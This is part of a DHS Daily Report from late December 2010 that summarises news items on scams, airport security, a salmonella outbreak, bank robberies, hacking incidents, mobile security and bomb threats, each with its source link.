53. December 26, Bloomington Pantagraph – (National) FBI looking for possible victims of phone scam. The FBI is looking for people who may have been victimized by a phone bill scam. The scam involves charges on phone bills for services related to Alternate Billing Corp., 24078 Greenway Road, Forest Lake, Minnesota, or any of the following: 800VMailbox; BusinessSEOPro; Digital VMail; Durham Technology; eProtectID; eSafeId; Identity Holdings; InfoCall; Instant 411; InstantSEOPro; Matchgamepro; Mobile 411 Plus; My411Connect; MyIDSafe; MyIProducts; NeedTheInfo; ProIdentityProtect; Safeguard My Credit; Streaming Flix; Streaming Flix-FamilyWebSafety; Streaming Flix-Iconz of Rock VIP; Streaming Flix-Mobile; Streaming Flix-National Lampoon; Streaming Flix-No Good TV Digital; Streaming Flix-UBD; Studio 127; Uvolve; VolCoff. According to a statement from the Springfield office, no further information can be released because of an ongoing inquiry. The FBI does want to contact people who believe they were improperly billed. Source: http://www.pantagraph.com/news/local/article_1509582a-1153-11e0-a2ba-001cc4c03286.html

54. December 24, Winona Daily News – (Minnesota) Blaze destroys Utica Telecommunications shed. The police scanner initially reported December 23 that the water tower in Utica, Minnesota, was on fire. When the Lewiston Fire Department, which covers Utica, arrived, the fire was nearly 200 feet up a hill, with a “minimum service road” mostly covered by 18 inches of snow. More than a dozen firefighters fought the blaze in a shed next to the city’s water tower. The shed housed satellites and cable equipment for Utica Telecommunications, a cable television service provider. The building had about 100 square feet of space. The assistant Lewiston fire chief said the owner of Utica was in the shed using de-icer and heard a pop when the fire broke out. The shed is just several yards away from the city’s well that feeds the water tower, Utica’s mayor said. The city’s water supply was unaffected. “This could have been real bad if it had spread,” he said. Fire crews were able to use a gravity-fed fire hydrant near the tower to put out the fire. It took crews about 10 minutes to extinguish the blaze. Firefighters had to trudge up nearly 200 feet of hill with hoses and nozzles to put out the flames. The temperature remained in the low 20s. The building was completely destroyed. Source: http://www.winonadailynews.com/news/local/article_d04fe9f6-0f0e-11e0-a35f-001cc4c03286.html

Tuesday, December 28, 2010

Complete DHS Daily Report for December 28, 2010

Daily Report

Top Stories

• CNN reports the Transportation Security Administration was unable to find a woman who breached a security checkpoint at a Texas airport December 25, despite a manhunt that left more than 100 flights delayed. (See item 23)

23. December 26, CNN – (Texas) TSA error causes big delays for Texas airport. The Transportation Security Administration (TSA) was unable to find a woman who breached a security checkpoint at a Texas airport December 25, despite a manhunt that left more than 100 flights delayed. The TSA said agents spotted something suspicious while an elderly woman went through a full-body scanner at the Dallas/Fort Worth International Airport. By the time security agents tried to pull the woman aside for additional screening, she had already moved into the terminal. TSA described the slip-up as a minor error, although it sparked a manhunt throughout the entire airport. Security agents mobilized the command post. Officers searched terminals for the woman, whose photos were given to gate agents. In the process, officers held dozens of flights in order to search planes. After 2 hours of searching, agents still were not able to locate the woman. Agents said she did nothing wrong and likely did not even realize security had flagged her. Source: http://www.ksla.com/Global/story.asp?S=13741290

• The Centers for Disease Control and Prevention announced December 24 it was investigating a 15-state outbreak of salmonella in alfalfa sprouts, according to the Crystal Lake Northwest Herald. (See item 28)

28. December 24, Crystal Lake Northwest Herald – (National) CDC reports salmonella outbreak affects 15 states. The Centers for Disease Control and Prevention (CDC) announced December 24 it was investigating a multi-state outbreak of salmonella in alfalfa sprouts, with 89 reports of a matching strain across 15 states and the District of Columbia. Preliminary results of the CDC investigation indicate a link to eating alfalfa sprouts at a national sandwich chain, the agency said. The CDC said there were reports of 50 cases in Illinois, 14 in Missouri, and 9 in Indiana. Among the 81 people for whom information was available, the CDC said their illnesses began between November 1 and December 14, and they ranged in age from 1 to 75 years old, with a median age of 28. Of the information available, the CDC said 23 percent of the people affected were hospitalized, with no deaths reported. The CDC said because the pattern associated with this salmonella type commonly occurred in the U.S., some cases currently identified might not be related to the outbreak. The outbreak first was reported December 17 when the Illinois Department of Public Health (IDPH) reported more than 40 people said they had become ill after eating alfalfa sprouts at Jimmy John’s restaurants. The IDPH’s update December 23 raised the count to 50 confirmed Illinois residents, and one Wisconsin resident, with reports stretching over 11 counties in the state. The CDC said the investigation was ongoing, and the agency would continue to monitor new cases, along with the Food and Drug Administration, and state and local public health partners. Source: http://www.nwherald.com/2010/12/23/cdc-reports-salmonella-outbreak-affects-15-states/agxgy43/

Details

Banking and Finance Sector

15. December 27, Slashgear – (International) Chip and PIN security hack prompts censorship rebuke from researchers. Cambridge University has refused to censor a masters student’s thesis on the security flaws in the Chip and PIN security system, rebuking calls from the UK Cards Association trade body to bury the research after allegations it “breaches the boundary of responsible disclosure.” According to a security group researcher, not only is the paper lawful and already in the public domain, it will soon be followed by a similarly-detailed paper on the subject. The Association claimed the loophole utilized has already been fixed when using Barclays bank cards at a Barclays merchant, though that still leaves Chip and PIN systems managed by other banks open to attack. The research had led to the creation of a card-sized monitoring device that can track transactions and flag up — among other things — cases where illegally modified card-readers show one value on-screen and then charge a higher amount to the card. Source: http://www.slashgear.com/chip-and-pin-security-hack-prompts-censorship-rebuke-from-researchers-27121248/

16. December 27, London Telegraph – (International) Online stores insure against cyber-hacking after Wikileaks protest. Online retailers will be offered insurance against cyber-hacking following the recent attack by supporters of Wikileaks. IMRG, a trade body in England, will provide protection against politically-driven “denial of service” attacks that threaten Britain’s 57.8 billion pound online shopping industry. It follows the targeting of payment services PayPal, Visa and Mastercard earlier in December by “hacktivists” who accused them of bowing to U.S. pressure to hinder the release of embarrassing diplomatic cables. Amazon was also attacked because it had removed Wikileaks information from its servers. Christmas shopping was not disrupted, but the movement behind the attacks, calling itself Anonymous, said it would mount similar campaigns in the future. A member of the online security organization ISACA and chief executive of security consultants First Base Technologies, said: “Politically-motivated denial of service is a new threat to online retail because previously the threat has only been from criminals.” Source: http://www.telegraph.co.uk/finance/newsbysector/retailandconsumer/8224968/Online-stores-insure-against-cyber-hacking-after-Wikileaks-protest.html

17. December 26, Kansas City Star – (Missouri) Springfield company files lawsuit over hacker loss. A Springfield, Missouri escrow company has filed a lawsuit against BancorpSouth Bank, accusing the bank of failing to prevent a hacker from stealing $440,000 from the escrow company. The owner of Choice Escrow and Land Title said his company had to take out a loan to cover the loss because the bank wouldn’t refund any of the money. He said it appears criminals infected the escrow company’s computer and stole its user ID and password for its BancorpSouth trust account. The Bancorp senior vice president and director of marketing in Tupelo, Mississippi, said the bank would present its side during court proceedings. He declined further comment. Source: http://www.kansascity.com/2010/12/26/2542677/springfield-company-files-lawsuit.html

18. December 25, Krebs on Security – (International) Carders.cc, Backtrack-linux.org and Exploit-db.org Hacked. Carders.cc, a German security forum that specializes in trading stolen credit cards and other purloined data, has been hacked by security vigilantes for the second time this year. Also waking up to “you’ve been owned” calling cards this Christmas are exploit database exploit-db.org and backtrack-linux.org, the home of Backtrack, an open source “live CD” distribution of Linux. The hacks were detailed in the second edition of “Owned and Exposed,” an ezine whose first edition in May included the internal database and thousands of stolen credit card numbers and passwords from Carders.cc. The Christmas version of the ezine does not feature credit card numbers, but it does list the user names and hashed passwords of the carders.cc forum administrators. The main administrator for exploit-db.org and backtrack-linux.org confirmed the hacks against the sites were legitimate. In an e-mail, he provided a link to a short statement, noting a hacking team called inj3ct0r initially took credit for the attack, only to find itself also targeted in the current edition of Owned and Exposed. Source: http://krebsonsecurity.com/2010/12/carders-cc-linux-exploit-org-and-exploit-db-org-hacked/

19. December 25, Hillsdale Daily News – (Michigan) Hillsdale-area authorities seek bank robbery suspect. Authorities now believe the same man is responsible for three separate bank robberies of two Southern Michigan Bank and Trust branches in the past year. The most recent robbery occurred December 21 at the Camden branch. A witness at the bank described a car similar to the one spotted near the North Adams branch on the bank’s video surveillance system around the time it was robbed November 22. The car closely matched a mid-90s Buick Regal. A composite sketch of the suspect, as described by a witness, has been released. The witness saw the man before the first robbery of the North Adams branch February 17. The witness said the man was acting suspiciously in the parking lot. A detective with the Hillsdale County Sheriff’s Department said the Camden bank’s last customer before the robbery saw a car parked in the bank lot facing out toward the street near the entrance. The detective said it struck the witness as odd that the vehicle was not in a parking space. As the customer approached the bank, a man started to get out of the car, but stopped when he saw them and got back into the car. The car was described as a white, four-door sedan with a dirty grey trim on the lower door from front to back, similar in appearance to a mid-90s Buick Regal. The Hillsdale sheriff’s department is investigating the robberies in conjunction with the Michigan State Police and the FBI. Source: http://www.lenconnect.com/news/x1651495527/Hillsdale-area-authorities-seek-bank-robbery-suspect

20. December 25, White Mountain Independent – (Arizona) ‘Skeletor Bandit’ indicted - Defendant charged with robbing banks in Northern AZ. A federal grand jury in Phoenix, Arizona, returned a six-count indictment against a 51-year-old male suspect, who hails from Lincoln, California, charging him with multiple bank robberies in Arizona. He is accused of being the “Skeletor Bandit” responsible for robbing six banks. The indictment alleges that between October 22 and December 11, 2010, the suspect robbed six banks in Flagstaff, Phoenix, Prescott, and Surprise. In the first four robberies, the suspect wore a Halloween-style rubber mask with a black hooded sweatshirt while displaying a gun. The robber was dubbed the “Skeletor Bandit” based on the mask’s resemblance to a cartoon character from the 1980s. In the last two robberies, he wore a fake beard, wig and nose along with a New York Yankees cap, and told witnesses he was armed. The suspect is in custody and will go to trial February 1, 2011 before a U.S. district judge in Phoenix. Source: http://www.wmicentral.com/police/article_94b7b6d8-0ee8-11e0-9397-001cc4c002e0.html

For another story, see item 39 below.

Information Technology

38. December 27, SpamfighterNews – (National) Kindsight research reveals 33% home PCs hacked. Kindsight, the developer of “Identity Protection,” recently announced 30-day research outcomes after surveying about 200,000 North American households that use the Internet. The research revealed that 33 percent of household personal computers had contracted malware infections and were in severe danger of cyber-crime, ID-theft, and other attacks. Furthermore, after classifying the attacks into four groups, the research found spyware was behind 47 percent of the assaults, whilst Trojans along with other malware leading to ID-theft was behind 21 percent. Botnet attacks, which enable malefactors to seize control over home computers, successfully targeted 26 percent of the contaminated home PCs, while conventional viruses accounted for merely 6 percent of the assaults. Source: http://www.spamfighter.com/News-15556-Kindsight-Research-Reveals-33-Home-PCs-Hacked.htm

39. December 23, Federal Bureau of Investigation – (Minnesota; Texas) Texas man indicted for hacking into computer network, stealing $274,000. A federal indictment unsealed December 23 alleged a 35-year-old Texas man hacked into the computer network of an Eden Prairie, Minnesota, business and stole approximately $274,000. The indictment, which was filed in Minneapolis October 13, 2010, charges the suspect, of Houston, Texas, with one count of unauthorized access to a protected computer in furtherance of fraud, and one count of wire fraud. The indictment was unsealed following the suspect’s initial appearance in United States District Court. The indictment alleges that from December 23, 2008, through October 15, 2009, the suspect hacked into the computer network in order to obtain money belonging to Digital River, Inc., a cyber-based business, through a subsidiary, SWReg, Inc. Source: http://7thspace.com/headlines/367783/texas_man_indicted_for_hacking_into_computer_network_stealing_274000__.html

For another story, see item 40 below.

Communications Sector

40. December 26, eWeek – (National) Verizon, RIM investing in mobile security to protect phones from attackers. Carriers, developers, and phone makers are rolling out new services and features to protect mobile devices from malicious attacks and data breaches. As people increase their use of smartphones to check e-mail, do their banking, and access documents, the wireless industry is addressing mobile device security. The effort is not limited to IT administrators within the enterprises, as carriers and phone makers are deploying new features and services to bring security to the mobile devices, according to the Wall Street Journal. “Everyone is realizing that this is an uncontrolled environment. We don’t want to have the same problems that we had with PCs,” the chief security officer of AT&T told the Wall Street Journal. Several security vendors have raised the alarm, predicting that various types of mobile threats will appear in 2011. Researchers at Panda Security said there will be new attacks on mobile devices, “but not on a massive scale,” which will target Symbian- and Android-based phones. In many cases, some of the security features are already available within the smartphone operating system. For example, one of the most frequently touted mobile security features for preventing data breaches, remote wipe, is available in the latest version of the Android operating system, as well as for the BlackBerry and iPhone. Source: http://www.eweek.com/c/a/Security/Verizon-RIM-Investing-in-Mobile-Security-to-Protect-Phones-from-Attackers-391875/

41. December 25, Associated Press – (Hawaii) Heavy rain disrupts Oahu landline phone service. Hawaiian Telcom said heavy rain the weekend of December 18 and 19 on the island of Oahu, Hawaii caused water to seep into the company’s cables, shorting circuits and disrupting landline service. The company said cables must be dried out and replaced. This means some customers were expected to temporarily lose service or notice static on the line. The Honolulu Star-Advertiser said readers in Makiki, Pearl City, and Aiea reported phone outages December 23. A Hawaiian Telcom spokesman said crews were working every day in 10- to 12-hour shifts, and would be working through December 25. Technicians from the neighbor islands were flown in to assist with repair efforts. Source: http://www.kpua.net/news.php?id=21886

42. December 25, KDVR 31 Denver – (Colorado) Englewood Police investigate molotov cocktail attack. Authorities recovered as many as 10 explosive devices from inside an Englewood, Colorado cell phone store December 24 after what appears to be a failed attempt to set fire to the business. Officers responded to CTG Wireless, located at 4720 South Santa Fe Circle, at about 7 a.m. after someone called Englewood Police to report several windows had been broken. Inside the store, authorities found as many as 10 explosive devices similar to a “Molotov Cocktail,” said an officer with Englewood Police. “The decision was made to call the Arapahoe County bomb squad just as a precaution,” he said. None of the devices detonated and damage to the store was minimal. Still, neighboring businesses in the strip mall were evacuated until the bomb squad determined the devices no longer posed a threat. Englewood police said the Bureau of Alcohol, Tobacco, Firearms and Explosives is assisting the investigation. Source: http://www.kwgn.com/news/kdvr-explosive-devices-found-in-eng-122410,0,5203900.story

43. December 24, KYMA 11 Yuma/El Centro – (Arizona) Bomb threat called into call center. San Luis, Arizona police officers told News 11 someone called the police department around noon, December 24, claiming there was a bomb at the ACT call center in San Luis. Officers said hundreds of people were at work and had to be evacuated for about two and a half hours. Police brought in a military police bomb detection dog. At about 2:30 p.m., police gave the all clear, and everyone was let back in the building. Police are looking for the person or persons who called in the bomb threat. Source: http://www.kyma.com/slp.php?idN=4519&cat=Local News